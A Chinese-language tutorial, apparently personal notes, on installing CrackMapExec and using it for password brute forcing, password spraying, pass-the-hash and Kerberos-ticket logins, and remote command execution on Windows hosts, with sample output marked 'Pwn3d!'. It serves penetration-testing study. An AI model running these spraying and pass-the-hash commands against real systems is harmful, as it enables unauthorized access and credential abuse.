下载地址:https://github.com/Porchetta-Industries/CrackMapExec
wiki:https://www.crackmapexec.wiki/
1、安装过程。(最好挂着梯子装)
https://www.crackmapexec.wiki/getting-started/installation/installation-on-unix
#~ python3 -m pip install pipx
#~ git clone https://github.com/mpgn/CrackMapExec
#~ cd CrackMapExec
#~ pipx install .
2、报警告信息。
提示没有 rust,先装个 rust 试试。
brew install rust
3、重新安装,成功。
1、告警信息。
/Users/xx/.local/pipx/venvs/crackmapexec/lib/python3.9/site-packages/urllib3/__init__.py:34: NotOpenSSLWarning: urllib3 v2.0 only supports OpenSSL 1.1.1+, currently the 'ssl' module is compiled with 'LibreSSL 2.8.3'. See: https://github.com/urllib3/urllib3/issues/3020
升级版本可解决
2、卸载 python3.9 pipx安装的 cme。
pipx uninstall crackmapexec
3、重新使用 python3.11 安装。
python3.11 -m pipx install .
安装成功。
运行未提示告警。
python3.11 -m pipx list
查看,没问题。
使用协议
使用特定协议运行
cme <protocol> <protocol options>
查看可用协议
运行cme --help将列出可用的常规选项和协议(请注意下面的“协议”部分):
#~ cme --help
usage: cme [-h] [-v] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL]
[--darrell] [--verbose]
每个协议都通过 CIDR 表示法、IP 地址、IP 范围、主机名、包含目标列表的文件或所有后者的组合来支持目标:
crackmapexec <protocol> poudlard.wizard
crackmapexec <protocol> 192.168.1.0 192.168.0.2
crackmapexec <protocol> 192.168.1.0/24
crackmapexec <protocol> 192.168.1.0-28 10.0.0.1-67
crackmapexec <protocol> ~/targets.txt
https://www.crackmapexec.wiki/getting-started/using-credentials
每个协议都支持以一种或另一种形式使用凭证。有关通过特定协议使用凭据的详细信息,请参阅相应的 wiki 部分。
1、一般来说,要使用凭据,您可以运行以下命令:
crackmapexec <protocol> <target(s)> -u username -p password
2、当使用包含特殊符号的用户名或密码时,请将它们用单引号引起来,以使 shell 将它们解释为字符串。
crackmapexec <protocol> <target(s)> -u username -p 'October2022'
3、由于Python 参数解析库中的错误,以破折号 ( - ) 开头的凭据将引发错误消息。要解决此问题,请使用“长”参数格式指定凭据(注意符号):-expected at least one argument=
crackmapexec <protocol> <target(s)> -u='-username' -p='-October2022'
报错:
解决:
您可以在多域环境中使用 CME
crackmapexec <protocol> <target(s)> -p FILE -u password
其中FILE是具有这种格式的用户名的文件
DOMAIN1\user
DOMAIN2\user
所有协议都支持暴力破解和密码喷射。有关使用特定协议进行暴力破解/密码喷射的详细信息,请参阅相应的 wiki 部分。
通过指定一个文件或多个值,CME 将自动使用指定协议对所有目标进行暴力登录:
例子:
crackmapexec <protocol> <target(s)> -u username1 -p password1 password2
crackmapexec <protocol> <target(s)> -u username1 username2 -p password1
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes
对于 WinRM 和 MSSQL 等协议非常有用。此选项可以避免使用文件时的暴力破解(-u file -p file)
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes --no-bruteforce
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords --no-bruteforce
user1 -> pass1
user2 -> pass2
默认情况下,CME 会在发现成功登录后退出。即使找到有效密码后,使用 --continue-on-success 标志也会继续喷射。对于针对大型用户列表喷射单个密码非常有用。
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes --no-bruteforce --continue-on-success
CME 确实支持 Kerberos 身份验证,有两种选择,直接使用密码/哈希或使用票证并使用环境KRB5CCNAME名称指定票证。
使用选项-k or–use-kcache 时,您需要指定与 kerberos 票证中的主机名相同的主机名 (FQDN)
$ sudo cme smb zoro.gold.local -k -u bonclay -p Ocotober2022
SMB zoro.gold.local 445 ZORO [*] Windows 10.0 Build 14393 (name:ZORO) (domain:gold.local) (signing:False) (SMBv1:False)
SMB zoro.gold.local 445 ZORO [+] gold.local\bonclay
或者,使用–use-kcache,这里可以看到管理员票据可以执行命令,其他票据执行命令失败。
$ export KRB5CCNAME=/home/bonclay/impacket/administrator.ccache
$ cme smb zoro.gold.local --use-kcache
SMB zoro.gold.local 445 ZORO [*] Windows 10.0 Build 14393 (name:ZORO) (domain:gold.local) (signing:False) (SMBv1:False)
SMB zoro.gold.local 445 ZORO [+] gold.local\administrator (Pwn3d!)
$ sudo cme smb zoro.gold.local --use-kcache -x whoami
SMB zoro.gold.local 445 ZORO [*] Windows 10.0 Build 14393 (name:ZORO) (domain:gold.local) (signing:False) (SMBv1:False)
SMB zoro.gold.local 445 ZORO [+] gold.local\administrator (Pwn3d!)
SMB zoro.gold.local 445 ZORO [+] Executed command
SMB zoro.gold.local 445 ZORO gold\administrator
$ export KRB5CCNAME=/home/bonclay/impacket/bonclay.ccache
$ sudo cme smb zoro.gold.local --use-kcache -x whoami
SMB zoro.gold.local 445 ZORO [*] Windows 10.0 Build 14393 (name:ZORO) (domain:gold.local) (signing:False) (SMBv1:False)
SMB zoro.gold.local 445 ZORO [+] gold.local\bonclay
LDAP 和选项示例–kdcHost
poetry run crackmapexec ldap poudlard.wizard -k --kdcHost dc01.poudlard.wizard
SMB poudlard.wizard 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:poudlard.wizard) (signing:True) (SMBv1:False)
LDAP poudlard.wizard 389 DC01 [+] poudlard.wizard\
对于有""的命令需要使用-x='命令’来执行。
cme smb 10.7.100.201 -u 'administrator' -H b30609be06b26c55c8cca512b142f9ca -x='net group "domain admins" /domain'
cme smb 192.168.xx -u 'xxx' -H 933fa1d9c956a189f -x='ipconfig'